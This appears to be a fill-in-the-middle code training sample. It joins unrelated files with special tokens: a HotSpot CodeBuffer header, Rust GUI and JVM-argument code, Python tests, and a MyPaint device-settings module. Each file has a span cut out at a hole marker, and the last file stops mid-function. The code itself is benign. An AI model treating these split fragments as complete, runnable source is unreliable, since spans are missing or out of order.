assert(cs->index() == n || !cs->is_allocated(), "sanity");
return cs;
}
const CodeSection* code_section(int n) const { // yucky const stuff
return ((CodeBuffer*)this)->code_section(n);
}
static const char* code_section_name(int n);
int section_index_of(address addr) const;
bool contains(address addr) const {
// handy for debugging
return section_index_of(addr) > SECT_NONE;
}
// A stable mapping between 'locators' (small ints) and addresses.
static int locator_pos(int locator) { return locator >> sect_bits; }
static int locator_sect(int locator) { return locator & sect_mask; }
static int locator(int pos, int sect) { return (pos << sect_bits) | sect; }
int locator(address addr) const;
address locator_address(int locator) const;
// Heuristic for pre-packing the taken/not-taken bit of a predicted branch.
bool is_backward_branch(Label& L);
// Properties
const char* name() const { return _name; }
CodeBuffer* before_expand() const { return _before_expand; }
BufferBlob* blob() const { return _blob; }
void set_blob(BufferBlob* blob);
void free_blob(); // Free the blob, if we own one.
// Properties relative to the insts section:
address insts_begin() const { return _insts.start(); }
address insts_end() const { return _insts.end(); }
void set_insts_end(address end) { _insts.set_end(end); }
address insts_limit() const { return _insts.limit(); }
address insts_mark() const { return _insts.mark(); }
void set_insts_mark() { _insts.set_mark(); }
void clear_insts_mark() { _insts.clear_mark(); }
// is there anything in the buffer other than the current section?
bool is_pure() const { return insts_size() == total_content_size(); }
// size in bytes of output so far in the insts sections
csize_t insts_size() const { return _insts.size(); }
// same as insts_size(), except that it asserts there is no non-code here
csize_t pure_insts_size() const { assert(is_pure(), "no non-code");
return insts_size(); }
// capacity in bytes of the insts sections
csize_t insts_capacity() const { return _insts.capacity(); }
// number of bytes remaining in the insts section
csize_t insts_remaining() const { return _insts.remaining(); }
// is a given address in the insts section? (2nd version is end-inclusive)
bool insts_contains(address pc) const { return _insts.contains(pc); }
bool insts_contains2(address pc) const { return _insts.contains2(pc); }
// Record any extra oops required to keep embedded metadata alive
void finalize_oop_references(methodHandle method);
// Allocated size in all sections, when aligned and concatenated
// (this is the eventual state of the content in its final
// CodeBlob).
csize_t total_content_size() const;
// Combined offset (relative to start of first section) of given
// section, as eventually found in the final CodeBlob.
csize_t total_offset_of(CodeSection* cs) const;
// allocated size of all relocation data, including index, rounded up
csize_t total_relocation_size() const;
// allocated size of any and all recorded oops
csize_t total_oop_size() const {
OopRecorder* recorder = oop_recorder();
return (recorder == NULL)? 0: recorder->oop_size();
}
// allocated size of any and all recorded metadata
csize_t total_metadata_size() const {
OopRecorder* recorder = oop_recorder();
return (recorder == NULL)? 0: recorder->metadata_size();
}
// Configuration functions, called immediately after the CB is constructed.
// The section sizes are subtracted from the original insts section.
// Note: Call them in reverse section order, because each steals from insts.
void initialize_consts_size(csize_t size) { initialize_section_size(&_consts, size); }
void initialize_stubs_size(csize_t size) { initialize_section_size(&_stubs, size); }
// Override default oop recorder.
void initialize_oop_recorder(OopRecorder* r);
OopRecorder* oop_recorder() const { return _oop_recorder; }
CodeStrings& strings() { return _strings; }
// Code generation
void relocate(address at, RelocationHolder const& rspec, int format = 0) {
_insts.relocate(at, rspec, format);
}
void relocate(address at, relocInfo::relocType rtype, int format = 0) {
_insts.relocate(at, rtype, format);
}
// Management of overflow storage for binding of Labels.
GrowableArray<int>* create_patch_overflow();
// NMethod generation
void copy_code_and_locs_to(CodeBlob* blob) {
assert(blob != NULL, "sane");
copy_relocations_to(blob);
copy_code_to(blob);
}
void copy_values_to(nmethod* nm) {
if (!oop_recorder()->is_unused()) {
oop_recorder()->copy_values_to(nm);
}
}
// Transform an address from the code in this code buffer to a specified code buffer
address transform_address(const CodeBuffer &cb, address addr) const;
void block_comment(intptr_t offset, const char * comment) PRODUCT_RETURN;
const char* code_string(const char* str) PRODUCT_RETURN_(return NULL;);
// Log a little info about section usage in the CodeBuffer
void log_section_sizes(const char* name);
#ifndef PRODUCT
public:
// Printing / Decoding
// decodes from decode_begin() to code_end() and sets decode_begin to end
void decode();
void decode_all(); // decodes all the code
void skip_decode(); // sets decode_begin to code_end();
void print();
#endif
// The following header contains architecture-specific implementations
#ifdef TARGET_ARCH_x86
# include "codeBuffer_x86.hpp"
#endif
#ifdef TARGET_ARCH_sparc
# include "codeBuffer_sparc.hpp"
#endif
#ifdef TARGET_ARCH_zero
# include "codeBuffer_zero.hpp"
#endif
#ifdef TARGET_ARCH_arm
# include "codeBuffer_arm.hpp"
#endif
#ifdef TARGET_ARCH_ppc
# include "codeBuffer_ppc.hpp"
#endif
};
inline void CodeSection::freeze() {
_outer->freeze_section(this);
}
inline bool CodeSection::maybe_expand_to_ensure_remaining(csize_t amount) {
if (remaining() < amount) { _outer->expand(this, amount); return true; }
return false;
}
#endif // SHARE_VM_ASM_CODEBUFFER_HPP<|fim▁end|> | |
<|file_name|>context_provider.rs<|end_file_name|><|fim▁begin|>use std::{
cell::{Cell, RefCell},
collections::BTreeMap,
rc::Rc,
sync::mpsc,
};
use dces::prelude::*;
use super::WindowAdapter;
use crate::{
event::*,
layout::*,
localization::Localization,
render_object::*,
shell::{ShellRequest, WindowRequest},
utils::Point,
widget_base::*,
};
/// Temporary solution to share dependencies. Will be refactored soon.
#[derive(Clone)]
pub struct ContextProvider {
/// Reference counted cells of render objects.
pub render_objects: Rc<RefCell<BTreeMap<Entity, Box<dyn RenderObject>>>>,
/// Reference counted cells of layouts objects.
pub layouts: Rc<RefCell<BTreeMap<Entity, Box<dyn Layout>>>>,
/// Reference counted cells of handler_map objects.<|fim▁hole|> pub handler_map: Rc<RefCell<EventHandlerMap>>,
/// Reference counted cells of handler_states.
pub states: Rc<RefCell<BTreeMap<Entity, Box<dyn State>>>>,
/// Event adapter objects.
pub event_adapter: EventAdapter,
/// Message adapter objects.
pub message_adapter: MessageAdapter,
/// Reference counted cells of mouse_positions defined as `points`
pub mouse_position: Rc<Cell<Point>>,
/// A window_sender object, used for multiparty session-typed communication.
pub window_sender: mpsc::Sender<WindowRequest>,
/// A shell_sender object, used for multiparty session-typed communication.
pub shell_sender: mpsc::Sender<ShellRequest<WindowAdapter>>,
/// Holds the application name.
pub application_name: String,
/// Reference counted cell to track the `first_run`
pub first_run: Rc<Cell<bool>>,
/// Holds a raw window handler object.
pub raw_window_handle: Option<raw_window_handle::RawWindowHandle>,
// TODO: make it thread safe
/// Reference counted cells that hold the supported localization identifiers.
pub localization: Option<Rc<RefCell<Box<dyn Localization>>>>,
}
impl ContextProvider {
/// Creates a new context provider.
pub fn new(
window_sender: mpsc::Sender<WindowRequest>,
shell_sender: mpsc::Sender<ShellRequest<WindowAdapter>>,
application_name: impl Into<String>,
localization: Option<Rc<RefCell<Box<dyn Localization>>>>,
) -> Self {
ContextProvider {
render_objects: Rc::new(RefCell::new(BTreeMap::new())),
layouts: Rc::new(RefCell::new(BTreeMap::new())),
handler_map: Rc::new(RefCell::new(EventHandlerMap::new())),
states: Rc::new(RefCell::new(BTreeMap::new())),
event_adapter: EventAdapter::new(window_sender.clone()),
message_adapter: MessageAdapter::new(window_sender.clone()),
mouse_position: Rc::new(Cell::new(Point::new(0.0, 0.0))),
window_sender,
shell_sender,
application_name: application_name.into(),
first_run: Rc::new(Cell::new(true)),
raw_window_handle: None,
localization,
}
}
}<|fim▁end|> | |
<|file_name|>test_db_search.py<|end_file_name|><|fim▁begin|>import pytest
from united_states_of_browsers.db_merge.db_search import (
check_fts5_installed,
search,
)
pytestmark = pytest.mark.skipif(
not check_fts5_installed(),
reason="FTS5 not available. Search disabled",
)
def test_search_with_keywords_and_dates(searchable_db_path):
actual_search_results_rec_ids = {}
search_keywords = ("circleci", "google", "gitlab")
for search_keyword_ in search_keywords:
actual_search_results_rec_ids[search_keyword_] = sorted(
[
row["rec_id"]
for row in search(
searchable_db_path,
word_query=search_keyword_,
date_start="2019-01-01",
date_stop="2388-12-31",
)
]
)
expected_search_results_rec_ids = {
"circleci": [50, 51],
"google": [32, 33, 45, 46, 48, 50],
"gitlab": [42, 43, 44],
}
assert expected_search_results_rec_ids == actual_search_results_rec_ids
def test_search_dates_specified(searchable_db_path):
expected_search_results_rec_ids = list(range(39, 52))
actual_search_results_rec_ids = sorted(
[
row["rec_id"]
for row in search(
searchable_db_path,
date_start="2388-09-01",
date_stop="2388-09-30",
)
]
)
assert expected_search_results_rec_ids == actual_search_results_rec_ids
def test_search_keywords(searchable_db_path):
expected_search_results_rec_ids = [13, 31]
actual_search_results_rec_ids = sorted(
[
row["rec_id"]<|fim▁hole|> ]
)
assert expected_search_results_rec_ids == actual_search_results_rec_ids
def test_search_dates_till_now(searchable_db_path):
expected_search_results_rec_ids = [*range(10, 20), *range(29, 39)]
actual_search_results_rec_ids = sorted(
[
row["rec_id"]
for row in search(
searchable_db_path,
)
]
)
assert expected_search_results_rec_ids == actual_search_results_rec_ids
def test_search_date_start(searchable_db_path):
expected_search_results_rec_ids = []
actual_search_results_rec_ids = sorted(
[
row["rec_id"]
for row in search(
searchable_db_path,
date_start="2388-09-01",
)
]
)
assert expected_search_results_rec_ids == actual_search_results_rec_ids
def test_search_date_stop(searchable_db_path):
expected_search_results_rec_ids = [*range(10, 20), *range(29, 39)]
actual_search_results_rec_ids = sorted(
[
row["rec_id"]
for row in search(
searchable_db_path,
date_stop="2019-09-04",
)
]
)
assert expected_search_results_rec_ids == actual_search_results_rec_ids<|fim▁end|> | for row in search(
searchable_db_path,
word_query="start page",
) |
<|file_name|>throughputanalysertest.py<|end_file_name|><|fim▁begin|>## begin license ##
#
# "Meresco Harvester" consists of two subsystems, namely an OAI-harvester and
# a web-control panel.
# "Meresco Harvester" is originally called "Sahara" and was developed for
# SURFnet by:
# Seek You Too B.V. (CQ2) http://www.cq2.nl
#
# Copyright (C) 2006-2007 SURFnet B.V. http://www.surfnet.nl
# Copyright (C) 2007-2008 SURF Foundation. http://www.surf.nl
# Copyright (C) 2007-2009, 2011 Seek You Too (CQ2) http://www.cq2.nl
# Copyright (C) 2007-2009 Stichting Kennisnet Ict op school. http://www.kennisnetictopschool.nl
# Copyright (C) 2009 Tilburg University http://www.uvt.nl
# Copyright (C) 2011, 2020-2021 Stichting Kennisnet https://www.kennisnet.nl
# Copyright (C) 2020-2021 Data Archiving and Network Services https://dans.knaw.nl
# Copyright (C) 2020-2021 SURF https://www.surf.nl
# Copyright (C) 2020-2021 Seecr (Seek You Too B.V.) https://seecr.nl
# Copyright (C) 2020-2021 The Netherlands Institute for Sound and Vision https://beeldengeluid.nl
#
# This file is part of "Meresco Harvester"
#
# "Meresco Harvester" is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# "Meresco Harvester" is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with "Meresco Harvester"; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
## end license ##
import unittest
import datetime, tempfile, os, shutil
from meresco.harvester.throughputanalyser import parseToTime, ThroughputAnalyser, ThroughputReport
class ThroughputAnalyserTest(unittest.TestCase):
def setUp(self):
self.mockAnalyseRepository_arguments = []
self.testdir = os.path.join(tempfile.gettempdir(), 'throughputanalysertest')
not os.path.isdir(self.testdir) and os.makedirs(self.testdir)
def tearDown(self):
shutil.rmtree(self.testdir)
def testParseToTime(self):
timeString = "1999-12-03 12:34:35.123"
date = parseToTime(timeString)
self.assertEqual((1999,12,3,12,34,35,123000), (date.year,date.month,date.day, date.hour, date.minute, date.second, date.microsecond))
date = parseToTime("2006-08-04 10:40:50.644")
self.assertEqual((2006,8,4,10,40,50,644000), (date.year,date.month,date.day, date.hour, date.minute, date.second, date.microsecond))
def testParseToTimeDiff(self):
date1 = parseToTime("1999-12-03 12:34:35.123")
date2 = parseToTime("1999-12-03 12:34:36.423")
delta = date2 - date1
self.assertEqual(1.3, delta.seconds + delta.microseconds/1000000.0)
<|fim▁hole|> t._analyseRepository = self.mockAnalyseRepository
report = t.analyse(['repo1','repo2'], '2006-08-31')
self.assertEqual(1000, report.records)
self.assertEqual(2000.0, report.seconds)
self.assertEqual(['repo1', 'repo2'], self.mockAnalyseRepository_arguments)
def testAnalyseNothing(self):
t = ThroughputAnalyser(eventpath = self.testdir)
t._analyseRepository = self.mockAnalyseRepository
report = t.analyse([], '2006-08-31')
self.assertEqual(0, report.records)
self.assertEqual(0.0, report.seconds)
self.assertEqual('-' , report.recordsPerSecond())
self.assertEqual('-' , report.recordsPerDay())
def testAnalyseRepository(self):
r = open(os.path.join(self.testdir, 'repo1.events'), 'w')
try:
r.write("""
[2006-08-30 00:00:15.500] ENDHARVEST [repo1]
[2006-08-30 01:00:00.000] STARTHARVEST [repo1] Uploader connected ...
[2006-08-30 01:00:10.000] SUCCES [repo1] Harvested/Uploaded/Deleted/Total: 200/200/0/1000, ResumptionToken: r1
[2006-08-30 01:00:15.500] ENDHARVEST [repo1]
[2006-08-31 01:00:00.000] STARTHARVEST [repo1] Uploader connected ...
[2006-08-31 01:00:10.000] SUCCES [repo1] Harvested/Uploaded/Deleted/Total: 200/200/0/1200, ResumptionToken: r1
[2006-08-31 01:00:15.500] ENDHARVEST [repo1]
[2006-08-31 02:00:00.000] STARTHARVEST [repo1] Uploader connected ...
[2006-08-31 02:00:10.000] SUCCES [repo1] Harvested/Uploaded/Deleted/Total: 200/200/0/1400, ResumptionToken: r2
[2006-08-31 02:00:25.500] ENDHARVEST [repo1]
[2006-08-31 03:00:00.000] STARTHARVEST [repo1] Uploader connected ...
[2006-08-31 03:00:10.000] SUCCES [repo1] Harvested/Uploaded/Deleted/Total: 200/200/0/1600, ResumptionToken: r3
[2006-08-31 03:00:35.500] ENDHARVEST [repo1]
""")
finally:
r.close()
t = ThroughputAnalyser(eventpath = self.testdir)
records, seconds = t._analyseRepository('repo1', '2006-08-31')
self.assertEqual(600, records)
self.assertEqual(76.5, seconds)
def testAnalyseNonExistingRepository(self):
t = ThroughputAnalyser(eventpath = self.testdir)
records, seconds = t._analyseRepository('repository', '2006-08-31')
self.assertEqual(0, records)
self.assertEqual(0.0, seconds)
def testReportOnEmptyEventsFile(self):
t = ThroughputAnalyser(eventpath = self.testdir)
records, seconds = t._analyseRepository('repo1', '2006-08-31')
self.assertEqual(0, records)
self.assertEqual(0, seconds)
def testReport(self):
report = ThroughputReport()
report.add(100000,10000.0)
self.assertEqual('10.00', report.recordsPerSecond())
self.assertEqual('864000', report.recordsPerDay())
self.assertEqual("02:46:40", report.hmsString())
#Mock self shunt
def mockAnalyseRepository(self, repositoryName, dateSince):
self.mockAnalyseRepository_arguments.append(repositoryName)
return 500, 1000.0<|fim▁end|> | def testAnalyse(self):
t = ThroughputAnalyser(eventpath = self.testdir) |
<|file_name|>parsed_jvm_command_lines.rs<|end_file_name|><|fim▁begin|>use itertools::Itertools;
use std::slice::Iter;
/// Represents the result of parsing the args of a nailgunnable Process
/// TODO(#8481) We may want to split the classpath by the ":", and store it as a Vec<String>
/// to allow for deep fingerprinting.
#[derive(PartialEq, Eq, Debug)]
pub struct ParsedJVMCommandLines {
pub nailgun_args: Vec<String>,
pub client_args: Vec<String>,
pub client_main_class: String,
}
impl ParsedJVMCommandLines {
///
/// Given a list of args that one would likely pass to a java call,
/// we automatically split it to generate two argument lists:
/// - nailgun arguments: The list of arguments needed to start the nailgun server.
/// These arguments include everything in the arg list up to (but not including) the main class.
/// These arguments represent roughly JVM options (-Xmx...), and the classpath (-cp ...).
///
/// - client arguments: The list of arguments that will be used to run the jvm program under nailgun.
/// These arguments can be thought of as "passthrough args" that are sent to the jvm via the nailgun client.
/// These arguments include everything starting from the main class.
///
/// We assume that:
/// - Every args list has a main class.
/// - There is exactly one argument that doesn't begin with a `-` in the command line before the main class,<|fim▁hole|> /// and it's the value of the classpath (i.e. `-cp scala-library.jar`).
///
/// We think these assumptions are valid as per: https://github.com/pantsbuild/pants/issues/8387
///
pub fn parse_command_lines(args: &[String]) -> Result<ParsedJVMCommandLines, String> {
let mut args_to_consume = args.iter();
let nailgun_args_before_classpath = Self::parse_to_classpath(&mut args_to_consume)?;
let (classpath_flag, classpath_value) = Self::parse_classpath(&mut args_to_consume)?;
let nailgun_args_after_classpath = Self::parse_jvm_args(&mut args_to_consume)?;
let main_class = Self::parse_main_class(&mut args_to_consume)?;
let client_args = Self::parse_to_end(&mut args_to_consume)?;
if args_to_consume.clone().peekable().peek().is_some() {
return Err(format!(
"Malformed command line: There are still arguments to consume: {:?}",
&args_to_consume
));
}
let mut nailgun_args = nailgun_args_before_classpath;
nailgun_args.push(classpath_flag);
nailgun_args.push(classpath_value);
nailgun_args.extend(nailgun_args_after_classpath);
Ok(ParsedJVMCommandLines {
nailgun_args,
client_args,
client_main_class: main_class,
})
}
fn parse_to_classpath(args_to_consume: &mut Iter<String>) -> Result<Vec<String>, String> {
Ok(
args_to_consume
.take_while_ref(|elem| !ParsedJVMCommandLines::is_classpath_flag(elem))
.cloned()
.collect(),
)
}
fn parse_classpath(args_to_consume: &mut Iter<String>) -> Result<(String, String), String> {
let classpath_flag = args_to_consume
.next()
.filter(|e| ParsedJVMCommandLines::is_classpath_flag(e))
.ok_or_else(|| "No classpath flag found.".to_string())
.map(|e| e.clone())?;
let classpath_value = args_to_consume
.next()
.ok_or_else(|| "No classpath value found!".to_string())
.and_then(|elem| {
if ParsedJVMCommandLines::is_flag(elem) {
Err(format!(
"Classpath value has incorrect formatting {}.",
elem
))
} else {
Ok(elem)
}
})?
.clone();
Ok((classpath_flag, classpath_value))
}
fn parse_jvm_args(args_to_consume: &mut Iter<String>) -> Result<Vec<String>, String> {
Ok(
args_to_consume
.take_while_ref(|elem| ParsedJVMCommandLines::is_flag(elem))
.cloned()
.collect(),
)
}
fn parse_main_class(args_to_consume: &mut Iter<String>) -> Result<String, String> {
args_to_consume
.next()
.filter(|e| !ParsedJVMCommandLines::is_flag(e))
.ok_or_else(|| "No main class provided.".to_string())
.map(|e| e.clone())
}
fn parse_to_end(args_to_consume: &mut Iter<String>) -> Result<Vec<String>, String> {
Ok(args_to_consume.cloned().collect())
}
fn is_flag(arg: &str) -> bool {
arg.starts_with('-') || arg.starts_with('@')
}
fn is_classpath_flag(arg: &str) -> bool {
arg == "-cp" || arg == "-classpath"
}
}<|fim▁end|> | |
<|file_name|>device.py<|end_file_name|><|fim▁begin|># This file is part of MyPaint.
# -*- coding: utf-8 -*-
# Copyright (C) 2014-2019 by the MyPaint Development Team.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
"""Device specific settings and configuration"""
## Imports
from __future__ import division, print_function
import logging
import collections
import re
from lib.gettext import C_
from lib.gibindings import Gtk
from lib.gibindings import Gdk
from lib.gibindings import Pango
from lib.observable import event
import gui.application
import gui.mode
logger = logging.getLogger(__name__)
## Device prefs
# The per-device settings are stored in the prefs in a sub-dict whose
# string keys are formed from the device name and enough extra
# information to (hopefully) identify the device uniquely. Names are not
# unique, and IDs vary according to the order in which you plug devices
# in. So for now, our unique strings use a combination of the device's
# name, its source as presented by GDK, and the number of axes.
_PREFS_ROOT = "input.devices"
_PREFS_DEVICE_SUBKEY_FMT = "{name}:{source}:{num_axes}"
## Device type strings
_DEVICE_TYPE_STRING = {
Gdk.InputSource.CURSOR: C_(
"prefs: device's type label",
"Cursor/puck",
),
Gdk.InputSource.ERASER: C_(
"prefs: device's type label",
"Eraser",
),
Gdk.InputSource.KEYBOARD: C_(
"prefs: device's type label",
"Keyboard",
),
Gdk.InputSource.MOUSE: C_(
"prefs: device's type label",
"Mouse",
),
Gdk.InputSource.PEN: C_(
"prefs: device's type label",
"Pen",
),
Gdk.InputSource.TOUCHPAD: C_(
"prefs: device's type label",
"Touchpad",
),
Gdk.InputSource.TOUCHSCREEN: C_(
"prefs: device's type label",
"Touchscreen",
),
}
## Settings consts and classes
class AllowedUsage:
"""Consts describing how a device may interact with the canvas"""
ANY = "any" #: Device can be used for any tasks.
NOPAINT = "nopaint" #: No direct painting, but can manipulate objects.
NAVONLY = "navonly" #: Device can only be used for navigation.
IGNORED = "ignored" #: Device cannot interact with the canvas at all.
VALUES = (ANY, IGNORED, NOPAINT, NAVONLY)
DISPLAY_STRING = {
IGNORED: C_(
"device settings: allowed usage",
u"Ignore",
),
ANY: C_(
"device settings: allowed usage",
u"Any Task",
),
NOPAINT: C_(
"device settings: allowed usage",
u"Non-painting tasks",
),
NAVONLY: C_(
"device settings: allowed usage",
u"Navigation only",
),
}
BEHAVIOR_MASK = {
ANY: gui.mode.Behavior.ALL,
IGNORED: gui.mode.Behavior.NONE,
NOPAINT: gui.mode.Behavior.NON_PAINTING,
NAVONLY: gui.mode.Behavior.CHANGE_VIEW,
}
class ScrollAction:
"""Consts describing how a device's scroll events should be used.
The user can assign one of these values to a device to configure
whether they'd prefer panning or scrolling for unmodified scroll
events. This setting can be queried via the device monitor.
"""
ZOOM = "zoom" #: Alter the canvas scaling
PAN = "pan" #: Pan across the canvas
VALUES = (ZOOM, PAN)
DISPLAY_STRING = {
ZOOM: C_("device settings: unmodified scroll action", u"Zoom"),
PAN: C_("device settings: unmodified scroll action", u"Pan"),
}
class Settings (object):
"""A device's settings"""
DEFAULT_USAGE = AllowedUsage.VALUES[0]
DEFAULT_SCROLL = ScrollAction.VALUES[0]
def __init__(self, prefs, usage=DEFAULT_USAGE, scroll=DEFAULT_SCROLL):
super(Settings, self).__init__()
self._usage = self.DEFAULT_USAGE
self._update_usage_mask()
self._scroll = self.DEFAULT_SCROLL
self._prefs = prefs
self._load_from_prefs()
@property
def usage(self):
return self._usage
@usage.setter
def usage(self, value):
if value not in AllowedUsage.VALUES:
raise ValueError("Unrecognized usage value")
self._usage = value
self._update_usage_mask()
self._save_to_prefs()
@property
def usage_mask(self):
return self._usage_mask
@property
def scroll(self):
return self._scroll
@scroll.setter
def scroll(self, value):
if value not in ScrollAction.VALUES:
raise ValueError("Unrecognized scroll value")
self._scroll = value
self._save_to_prefs()
def _load_from_prefs(self):
usage = self._prefs.get("usage", self.DEFAULT_USAGE)
if usage not in AllowedUsage.VALUES:
usage = self.DEFAULT_USAGE
self._usage = usage
scroll = self._prefs.get("scroll", self.DEFAULT_SCROLL)
if scroll not in ScrollAction.VALUES:
scroll = self.DEFAULT_SCROLL
self._scroll = scroll
self._update_usage_mask()
def _save_to_prefs(self):
self._prefs.update({
"usage": self._usage,
"scroll": self._scroll,
})
def _update_usage_mask(self):
self._usage_mask = AllowedUsage.BEHAVIOR_MASK[self._usage]
## Main class defs
class Monitor (object):
"""Monitors device use & plugging, and manages their configuration
An instance resides in the main application. It is responsible for
monitoring known devices, determining their characteristics, and
storing their settings. Per-device settings are stored in the main
application preferences.
"""
def __init__(self, app):
"""Initializes, assigning initial input device uses
:param app: the owning Application instance.
:type app: gui.application.Application
"""
super(Monitor, self).__init__()
self._app = app
if app is not None:
self._prefs = app.preferences
else:
self._prefs = {}
if _PREFS_ROOT not in self._prefs:
self._prefs[_PREFS_ROOT] = {}
# Transient device information
self._device_settings = collections.OrderedDict() # {dev: settings}
self._last_event_device = None
self._last_pen_device = None
disp = Gdk.Display.get_default()
mgr = disp.get_device_manager()
mgr.connect("device-added", self._device_added_cb)
mgr.connect("device-removed", self._device_removed_cb)
self._device_manager = mgr
for physical_device in mgr.list_devices(Gdk.DeviceType.SLAVE):
self._init_device_settings(physical_device)
## Devices list
def get_device_settings(self, device):
"""Gets the settings for a device
:param Gdk.Device device: a physical ("slave") device
:returns: A settings object which can be manipulated, or None
:rtype: Settings
Changes to the returned object made via its API are saved to the
user preferences immediately.
If the device is a keyboard, or is otherwise unsuitable as a
pointing device, None is returned instead. The caller needs to
check this case.
"""
return (self._device_settings.get(device)
or self._init_device_settings(device))
def _init_device_settings(self, device):
"""Ensures that the device settings are loaded for a device"""
source = device.get_source()
if source == Gdk.InputSource.KEYBOARD:
return
num_axes = device.get_n_axes()
if num_axes < 2:
return
settings = self._device_settings.get(device)
if not settings:
try:
vendor_id = device.get_vendor_id()
product_id = device.get_product_id()
except AttributeError:
# New in GDK 3.16
vendor_id = "?"
product_id = "?"
logger.info(
"New device %r"
" (%s, axes:%d, class=%s, vendor=%r, product=%r)",
device.get_name(),
source.value_name,
num_axes,
device.__class__.__name__,
vendor_id,
product_id,
)
dev_prefs_key = _device_prefs_key(device)
dev_prefs = self._prefs[_PREFS_ROOT].setdefault(dev_prefs_key, {})<|fim▁hole|> return settings
def _device_added_cb(self, mgr, device):
"""Informs that a device has been plugged in"""
logger.debug("device-added %r", device.get_name())
self._init_device_settings(device)
def _device_removed_cb(self, mgr, device):
"""Informs that a device has been unplugged"""
logger.debug("device-removed %r", device.get_name())
self._device_settings.pop(device, None)
self.devices_updated()
@event
def devices_updated(self):
"""Event: the devices list was changed"""
def get_devices(self):
"""Yields devices and their settings, for UI stuff
:rtype: iterator
:returns: ultimately a sequence of (Gdk.Device, Settings) pairs
"""
for device, settings in self._device_settings.items():
yield (device, settings)
## Current device
@event
def current_device_changed(self, old_device, new_device):
"""Event: the current device has changed
:param Gdk.Device old_device: Previous device used
:param Gdk.Device new_device: New device used
"""
def device_used(self, device):
"""Informs about a device being used, for use by controllers
:param Gdk.Device device: the device being used
:returns: whether the device changed
If the device has changed, this method then notifies interested
parties via the device_changed observable @event.
This method returns True if the device was the same as the previous
device, and False if it has changed.
"""
if not self.get_device_settings(device):
return False
if device == self._last_event_device:
return True
self.current_device_changed(self._last_event_device, device)
old_device = self._last_event_device
new_device = device
self._last_event_device = device
# small problem with this code: it doesn't work well with brushes that
# have (eraser not in [1.0, 0.0])
new_device.name = new_device.props.name
new_device.source = new_device.props.input_source
logger.debug(
"Device change: name=%r source=%s",
new_device.name, new_device.source.value_name,
)
# When editing brush settings, it is often more convenient to use the
# mouse. Because of this, we don't restore brushsettings when switching
# to/from the mouse. We act as if the mouse was identical to the last
# active pen device.
if (new_device.source == Gdk.InputSource.MOUSE and
self._last_pen_device):
new_device = self._last_pen_device
if new_device.source == Gdk.InputSource.PEN:
self._last_pen_device = new_device
if (old_device and old_device.source == Gdk.InputSource.MOUSE and
self._last_pen_device):
old_device = self._last_pen_device
bm = self._app.brushmanager
if old_device:
# Clone for saving
old_brush = bm.clone_selected_brush(name=None)
bm.store_brush_for_device(old_device.name, old_brush)
if new_device.source == Gdk.InputSource.MOUSE:
# Avoid fouling up unrelated devbrushes at stroke end
self._prefs.pop('devbrush.last_used', None)
else:
# Select the brush and update the UI.
# Use a sane default if there's nothing associated
# with the device yet.
brush = bm.fetch_brush_for_device(new_device.name)
if brush is None:
if device_is_eraser(new_device):
brush = bm.get_default_eraser()
else:
brush = bm.get_default_brush()
self._prefs['devbrush.last_used'] = new_device.name
bm.select_brush(brush)
class SettingsEditor (Gtk.Grid):
"""Per-device settings editor"""
## Class consts
_USAGE_CONFIG_COL = 0
_USAGE_STRING_COL = 1
_SCROLL_CONFIG_COL = 0
_SCROLL_STRING_COL = 1
__gtype_name__ = "MyPaintDeviceSettingsEditor"
## Initialization
def __init__(self, monitor=None):
"""Initialize
:param Monitor monitor: monitor instance (for testing)
By default, the central app's `device_monitor` is used to permit
parameterless construction.
"""
super(SettingsEditor, self).__init__()
if monitor is None:
app = gui.application.get_app()
monitor = app.device_monitor
self._monitor = monitor
self._devices_store = Gtk.ListStore(object)
self._devices_view = Gtk.TreeView(model=self._devices_store)
col = Gtk.TreeViewColumn(C_(
"prefs: devices table: column header",
# TRANSLATORS: Column's data is the device's name
"Device",
))
col.set_min_width(200)
col.set_expand(True)
col.set_sizing(Gtk.TreeViewColumnSizing.AUTOSIZE)
self._devices_view.append_column(col)
cell = Gtk.CellRendererText()
cell.set_property("ellipsize", Pango.EllipsizeMode.MIDDLE)
col.pack_start(cell, True)
col.set_cell_data_func(cell, self._device_name_datafunc)
col = Gtk.TreeViewColumn(C_(
"prefs: devices table: column header",
# TRANSLATORS: Column's data is the number of axes (an integer)
"Axes",
))
col.set_min_width(30)
col.set_resizable(True)
col.set_expand(False)
col.set_sizing(Gtk.TreeViewColumnSizing.AUTOSIZE)
self._devices_view.append_column(col)
cell = Gtk.CellRendererText()
col.pack_start(cell, True)
col.set_cell_data_func(cell, self._device_axes_datafunc)
col = Gtk.TreeViewColumn(C_(
"prefs: devices table: column header",
# TRANSLATORS: Column shows type labels ("Touchscreen", "Pen" etc.)
"Type",
))
col.set_min_width(120)
col.set_resizable(True)
col.set_expand(False)
col.set_sizing(Gtk.TreeViewColumnSizing.AUTOSIZE)
self._devices_view.append_column(col)
cell = Gtk.CellRendererText()
cell.set_property("ellipsize", Pango.EllipsizeMode.END)
col.pack_start(cell, True)
col.set_cell_data_func(cell, self._device_type_datafunc)
# Usage config value => string store (dropdowns)
store = Gtk.ListStore(str, str)
for conf_val in AllowedUsage.VALUES:
string = AllowedUsage.DISPLAY_STRING[conf_val]
store.append([conf_val, string])
self._usage_store = store
col = Gtk.TreeViewColumn(C_(
"prefs: devices table: column header",
# TRANSLATORS: Column's data is a dropdown allowing the allowed
# TRANSLATORS: tasks for the row's device to be configured.
u"Use for…",
))
col.set_min_width(100)
col.set_resizable(True)
col.set_expand(False)
self._devices_view.append_column(col)
cell = Gtk.CellRendererCombo()
cell.set_property("model", self._usage_store)
cell.set_property("text-column", self._USAGE_STRING_COL)
cell.set_property("mode", Gtk.CellRendererMode.EDITABLE)
cell.set_property("editable", True)
cell.set_property("has-entry", False)
cell.set_property("ellipsize", Pango.EllipsizeMode.END)
cell.connect("changed", self._usage_cell_changed_cb)
col.pack_start(cell, True)
col.set_cell_data_func(cell, self._device_usage_datafunc)
# Scroll action config value => string store (dropdowns)
store = Gtk.ListStore(str, str)
for conf_val in ScrollAction.VALUES:
